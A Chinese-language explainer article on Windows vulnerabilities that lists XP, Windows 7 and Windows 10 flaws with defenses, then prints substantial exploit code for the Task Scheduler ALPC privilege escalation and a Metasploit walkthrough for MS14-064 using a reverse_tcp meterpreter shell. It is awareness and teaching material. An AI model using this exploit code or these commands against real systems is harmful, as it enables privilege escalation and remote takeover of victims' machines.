我們電腦的windows系統，默認都會開啓系統更新，經常告訴我們要更新修復系統漏洞，還有我們也會自己安裝一些電腦維護軟件，比如安全衛士或電腦管家，有時系統啓動後經常會彈出窗口提示檢測到存在高危漏洞，那麼什麼是系統漏洞呢？Windows系統漏洞對電腦會造成什麼危害？常見的漏洞有哪些？ 攻擊者是如何利用這些漏洞的？

一、 Windows系統漏洞是什麼？

Windows系統漏洞是指操作系統在開發過程中存在的技術缺陷或程序錯誤，這些缺陷可能導致其他用戶(比如黑客)非法訪問或利用病毒攻擊計算機系統，從而竊取電腦重要資料和信息，甚至破壞操作系統。因此，系統開發商(比如微軟公司)一般每月都會發布最新的補丁程序用以修復新發現的漏洞。

二、系統漏洞有什麼危害

1、系統漏洞經常被不法者或黑客用於向電腦強制安裝惡意程序、傳播病毒以及植入木馬等；

2、系統漏洞容易導致電腦重要的數據和信息被竊取，嚴重者會導致操作系統被破壞，電腦數據全部丟失；

3、在局域網環境中，還會造成病毒的傳播，導致其他電腦癱瘓，危害極大；

4、被嚴重破壞的操作系統只能通過重裝系統來解決，u盤重裝ghost win7教程圖解。

三、系統漏洞有哪些類型

系統漏洞主要分爲兩種，一種是高危漏洞，另一種是功能性漏洞：

1、高危漏洞：系統核心和Office 漏洞，這些漏洞允許遠程執行代碼，使得電腦有被入侵的危險

2、功能性漏洞：軟件版本更新或給系統添加實用功能，用於解決普通的電腦問題，提升電腦性能

四、Windows XP、Windows 7、Windows 10系統常見漏洞

1.Windows XP系統常見漏洞

Windows XP系統常見的漏洞有UPNP服務漏洞、升級程序漏洞、幫助和支持中心漏洞、壓縮文件夾漏洞、服務拒絕漏洞、Windows Media Player漏洞、RDP漏洞、VM漏洞、熱鍵漏洞、賬號快速切換漏洞等。

（1）UPNP服務漏洞

漏洞描述：允許攻擊者執行任意指令。

Windows XP默認啓動的UPNP服務存在嚴重安全漏洞。UPNP（Universal Plug and Play）體系面向無線設備、PC和智能應用，提供普遍的對等網絡連接，在家用信息設備、辦公用網絡設備間提供TCP/IP連接和Web訪問功能，該服務 可用於檢測和集成UPNP硬件。

UPNP協議存在安全漏洞，使攻擊者可非法獲取任何Windows XP的系統級訪問，進行攻擊，還可通過控制多臺XP機器發起分佈式的攻擊。

防禦策略：禁用UPNP服務後下載並安裝對應的補丁程序。

（2）升級程序漏洞

漏洞描述：如將Windows XP升級至Windows XP Pro，IE會重新安裝，以前打的補丁程序將被全部清除。

Windows XP的升級程序不僅會刪除IE的補丁文件，還會導致微軟的升級服務器無法正確識別IE是否存在缺陷，即Windows XP Pro系統存在如下2個潛在威脅。

·某些網頁或HTML郵件的腳本可自動調用Windows的程序。

·可通過IE漏洞窺視用戶的計算機文件。

防禦策略：如IE瀏覽器未下載升級補丁可至微軟網站下載最新補丁程序。

（3）幫助和支持中心漏洞

漏洞描述：刪除用戶系統的文件。

幫助和支持中心提供集成工具，用戶可獲取針對各種主題的幫助和支持。在Windows XP幫助和支持中心存在漏洞，可使攻擊者跳過特殊網頁（在打開該網頁時調用錯誤的函數，並將存在的文件或文件夾名字作爲參數傳送）使上傳文件或文件夾的操 作失敗，隨後該網頁可在網站上公佈，以攻擊訪問該網站的用戶或被作爲郵件傳播來攻擊。該漏洞除使攻擊者可刪除文件外不會賦予其他權利，攻擊者既無法獲取系 統管理員的權限，也無法讀取或修改文件。

防禦策略：安裝Windows XP的Service Pack 3。

（4）壓縮文件夾漏洞

漏洞描述：Windows XP壓縮文件夾可按攻擊者的選擇運行代碼。

在安裝有"Plus"包的Windows XP系統中，"壓縮文件夾"功能允許將Zip文件作爲普通文件夾處理。"壓縮文件夾"功能存在2個漏洞，如下所述。

·在解壓縮Zip文件時會有未經檢查的緩衝存在於程序中，以存放被解壓文件，因此很可能導致瀏覽器崩潰或攻擊者的代碼被運行。

·解壓縮功能在非用戶指定目錄中放置文件，可使攻擊者在用戶系統的已知位置中放置文件。

防禦策略：不接收不信任的郵件附件，也不下載不信任的文件。

（5）服務拒絕漏洞

漏洞描述：服務拒絕。

Windows XP支持點對點的協議（PPTP）作爲遠程訪問服務實現的虛擬專用網技術。由於在其控制用於建立、維護和拆開PPTP連接的代碼段中存在未經檢查的緩存， 導致Windows XP的實現中存在漏洞。通過向一臺存在該漏洞的服務器發送不正確的PPTP控制數據，攻擊者可損壞核心內存並導致系統失效，中斷所有系統中正在運行的進 程。該漏洞可攻擊任何一臺提供PPTP服務的服務器。對於PPTP客戶端的工作站，攻擊者只需激活PPTP會話即可進行攻擊。對任何遭到攻擊的系統，可通 過重啓來恢復正常操作。

防禦策略：關閉PPTP服務。

（6）Windows Media Player漏洞

漏洞描述：可能導致用戶信息的泄漏，腳本調用，緩存路徑泄漏。

Windows Media Player漏洞主要產生2個問題：一是信息泄漏漏洞，它給攻擊者提供了一種可在用戶系統上運行代碼的方法，微軟對其定義的嚴重級別爲"嚴重"；二是腳本 執行漏洞，當用戶選擇播放一個特殊的媒體文件，接着又瀏覽一個特殊建造的網頁後，攻擊者就可利用該漏洞運行腳本。由於該漏洞有特別的時序要求，因此利用該 漏洞進行攻擊相對就比較困難，它的嚴重級別也就比較低。

防禦策略：將要播放的文件先下載到本地再播放，即可不受利用此漏洞進行的攻擊。

（7）RDP漏洞

漏洞描述：信息泄露並拒絕服務。

Windows操作系統通過RDP（Remote Data Protocol）爲客戶端提供遠程終端會話。RDP協議將終端會話的相關硬件信息傳送至遠程客戶端，其漏洞如下所述。

·與某些RDP版本的會話加密實現有關的漏洞。所有RDP實現均允許對RDP會話中的數據進行加密，在 Windows 2000和Windows XP版本中，純文本會話數據的校驗在發送前並未經過加密，竊聽並記錄RDP會話的攻擊者，可對該校驗密碼分析攻擊並覆蓋該會話傳輸。

·與Windows XP中的RDP實現對某些不正確的數據包處理方法有關的漏洞。當接收這些數據包時，遠程桌面服務將會失效，同時也會導致操作系統失效。攻擊者向一個已受影響的系統發送這類數據包時，並不需經過系統驗證。

防禦策略：Windows XP默認並未啓動它的遠程桌面服務。即使遠程桌面服務啓動，只需在防火牆中屏蔽3389端口，即可避免該攻擊。

（8）VM漏洞

漏洞描述：可能造成信息泄露，並執行攻擊者的代碼。

攻擊者可通過向JDBC類傳送無效的參數使宿主應用程序崩潰，攻擊者需在網站上擁有惡意的Java applet並引誘用戶訪問該站點。惡意用戶可在用戶機器上安裝任意DLL，並執行任意的本機代碼，潛在地破壞或讀取內存數據。

防禦策略：經常進行相關軟件的安全更新。

（9）熱鍵漏洞

漏洞描述：設置熱鍵後，由於Windows XP的自注銷功能，可使系統"假註銷"，其他用戶即可通過熱鍵調用程序。

熱鍵功能是系統提供的服務，當用戶離開計算機後，該計算機即處於未保護情況下，此時Windows XP會自動實施"自注銷"，雖然無法進入桌面，但由於熱鍵服務還未停止，仍可使用熱鍵啓動應用程序。

防禦策略：

①由於該漏洞被利用的前提爲熱鍵可用，因此需檢查可能會帶來危害的程序和服務的熱鍵。

②啓動屏幕保護程序，並設置密碼。

③在離開計算機時鎖定計算機。

（10）賬號快速切換漏洞

漏洞描述：Windows XP快速賬號切換功能存在問題，可造成賬號鎖定，使所有非管理員賬號均無法登錄。

Windows XP系統設計了賬號快速切換功能，使用戶可快速地在不同的賬號間切換，但其設計存在問題，可被用於造成賬號鎖定，使所有非管理員賬號均無法登錄。配合賬號 鎖定功能，用戶可利用賬號快速切換功能，快速重試登錄另一個用戶名，系統則會判別爲暴力破解，從而導致非管理員賬號鎖定。

2.Windows 7系統常見漏洞

與Windows XP相比，Windows 7系統中的漏洞就少了很多。Windows 7系統中常見的漏洞有快捷方式漏洞與SMB協議漏洞2種。

（1）快捷方式漏洞

漏洞描述：快捷方式漏洞是Windows Shell框架中存在的一個危急安全漏洞。在Shell32.dll的解析過程中，會通過"快捷方式"的文件格式去逐個解析：首先找到快捷方式所指向的文 件路徑，接着找到快捷方式依賴的圖標資源。這樣，Windows桌面和開始菜單上就可以看到各種漂亮的圖標，我們點擊這些快捷方式時，就會執行相應的應用 程序。

微軟Lnk漏洞就是利用了系統解析的機制，攻擊者惡意構造一個特殊的Lnk（快捷方式）文件，精心構造一串程序 代碼來騙過操作系統。當Shell32.dll解析到這串編碼的時候，會認爲這個"快捷方式"依賴一個系統控件（dll文件），於是將這個"系統控件"加 載到內存中執行。如果這個"系統控件"是病毒，那麼Windows在解析這個lnk（快捷方式）文件時，就把病毒激活了。該病毒很可能通過USB存儲器進 行傳播。

防禦策略：禁用USB存儲器的自動運行功能，並且手動檢查USB存儲器的根文件夾。

（2）SMB協議漏洞

SMB協議主要是作爲Microsoft網絡的通信協議，用於在計算機間共享文件、打印機、串口等。當用戶執行 SMB2協議時系統將會受到網絡攻擊從而導致系統崩潰或重啓。因此，只要故意發送一個錯誤的網絡協議請求，Windows 7系統就會出現頁面錯誤，從而導致藍屏或死機。

防禦策略：關閉SMB服務。

3、Windows 10常見漏洞

本地提權漏洞：

漏洞背景

win10中任務調度服務導出的函數沒有驗證調用者的權限，任意權限的用戶調用該函數可以獲取系統敏感文件的寫權限，進而提權。

漏洞影響

漏洞影響win10和windows server 2016。目前發佈的EXP暫時只能用於x64系統。

漏洞詳情

win10系統Task Scheduler任務調度服務中ALPC調用接口導出了SchRpcSetSecurity函數，該函數能夠對一個任務或者文件夾設置安全描述符。

HRESULT SchRpcSetSecurity( [in, string] const wchar_t* path, [in,string] const wchar_t* sddl, [in] DWORD flags );

該服務是通過svchost的服務組netsvcs所啓動的，對應的dll是schedsvc.dll。

在xp系統中，任務存放在C:WindowsTasks目錄，後綴爲.job；而win7及以後的版本任務以xml的格式存放在C:WindowsSystem32Tasks目錄。

可能是爲了兼容的考慮，SchRpcSetSecurity函數在win10中仍然會檢測C:WindowsTasks目錄下是否存在後綴爲.job的文件，如果存在則會寫入DACL數據。如果將job文件硬鏈接到特定的dll那麼特定的dll就會被寫入DACL數據，本來普通用戶對特定的dll只具有讀權限，這樣就具有了寫權限，接下來向dll寫入漏洞利用代碼並啓動相應的程序就獲得了提權。

那麼首先需要找到一個普通用戶具有讀權限而系統具有寫入DACL權限的dll，EXP中用的是C:WindowsSystem32DriverStoreFileRepositoryprnms003.inf_amd64_4592475aca2acf83Amd64printconfig.dll，然後將C:WindowsTasksUpdateTask.job硬鏈接到這個dll。

WIN32_FIND_DATA FindFileData; HANDLE hFind; hFind = FindFirstFile(L"C:WindowsSystem32DriverStoreFileRepositoryprnms003.inf_amd64*", &FindFileData); wchar_t BeginPath[MAX_PATH] = L"c:windowssystem32DriverStoreFileRepository"; wchar_tPrinterDriverFolder[MAX_PATH]; wchar_t EndPath[23] = L"Amd64PrintConfig.dll"; wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName)); FindClose(hFind); wcscat(BeginPath, PrinterDriverFolder); wcscat(BeginPath, EndPath); //Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of CreateNativeHardlink(L"c:windowstasksUpdateTask.job", BeginPath);

在調用SchRpcSetSecurity函數使普通用戶成功獲取了對該dll寫入的權限之後寫入資源文件中的exploit.dll。

//Must be name of final DLL.. might be better ways to grab the handle HMODULE mod = GetModuleHandle(L"ALPC-TaskSched-LPE"); //Payload is included as a resource, you need to modify this resource accordingly. HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); unsigned int myResourceSize = ::SizeofResource(mod, myResource); HGLOBAL myResourceData = ::LoadResource(mod, myResource); void* pMyBinaryData = ::LockResource(myResourceData); //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue HANDLE hFile; DWORD dwBytesWritten = 0; do { hFile = CreateFile(BeginPath,GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); WriteFile(hFile,(char*)pMyBinaryData,myResourceSize,&dwBytesWritten,NULL); if (hFile == INVALID_HANDLE_VALUE) { Sleep(5000); } } while (hFile == INVALID_HANDLE_VALUE); CloseHandle(hFile);

printconfig.dll和系統打印相關，並且沒有被print spooler服務默認啓動。所以隨後調用StartXpsPrintJob開始一個XPS打印。

//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service. CoInitialize(nullptr); IXpsOMObjectFactory *xpsFactory = NULL; CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast

(&xpsFactory));

HANDLE completionEvent = CreateEvent(

NULL, TRUE, FALSE,

NULL);

IXpsPrintJob *job =

NULL;

IXpsPrintJobStream *jobStream =

NULL;

StartXpsPrintJob(

L"Microsoft XPS Document Writer",

L"Print Job 1",

NULL,

NULL, completionEvent,

NULL,

0, &job, &jobStream,

NULL);

jobStream->Close();

CoUninitialize();

return

0;

整個漏洞利用程序編譯出來是個dll，把它注入到notepad中運行，發現spoolsv.exe創建的notepad已經具有SYSTEM權限，而系統中的printconfig.dll也被修改成了資源文件中的exploit.dll。

防禦措施

建議用戶安裝360安全衛士等終端防禦軟件攔截利用此類漏洞的攻擊，不要打開來源不明的程序。

四、以實例講解攻擊者是如何利用系統漏洞發起攻擊的

利用MS14-064 漏洞測試入侵win7

Microsoft Windows OLE遠程代碼執行漏洞，OLE（對象鏈接與嵌入）是一種允許應用程序共享數據和功能的技術，

遠程攻擊者利用此漏洞通過構造的網站執行任意代碼，影響Win95+IE3 – Win10+IE11全版本...

裏已經加入了此漏洞的利用模塊 ：exploit/windows/browser/ms14_064_ole_code_execution

執行命令：

msfconsole //啓動MSF

search ms14 //搜索關鍵字

use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊

set payload windows/meterpreter/reverse_tcp //設置反彈連接shell

如圖：

需要注意的是箭頭標記的屬性默認爲false 需要設置爲true ，因爲msf中自帶的漏洞利用exp調用的是 powershell，

所以msf（Metasploit Framework）中的exp代碼只對安裝powershell的系統生效。安裝自帶powershell，

所以我們這裏測試受害的機器爲windows7 32位.

按照圖中各個屬性配置好後 執行exploit即可

得到一個URL地址，複製到受害者機器(win7)測試

當用戶點擊允許了後

可以看見這邊反彈了一個shell,接下里我們就可以隨便搞了，

攻擊成功，結束！！！

五、漏洞攻擊如何防護

1、及時修復系統環境中存在的安全漏洞

防範漏洞攻擊最直接有效的方法就是修復系統環境中存在的安全漏洞。

2、 保持騰訊電腦管家、360安全衛士等安全軟件的正常開啓

正常開啓騰訊電腦管家或者360安全衛士等安全軟件，可以有效攔截利用漏洞觸發傳播的病毒，有效彌補漏洞修復的不足。

3、 培養良好的計算機使用習慣

a) 提高計算機網絡安全意識

b) 不要輕易下載不明軟件程序

c) 不要輕易打開不明郵件夾帶的可疑附件

d) 及時備份重要的數據文件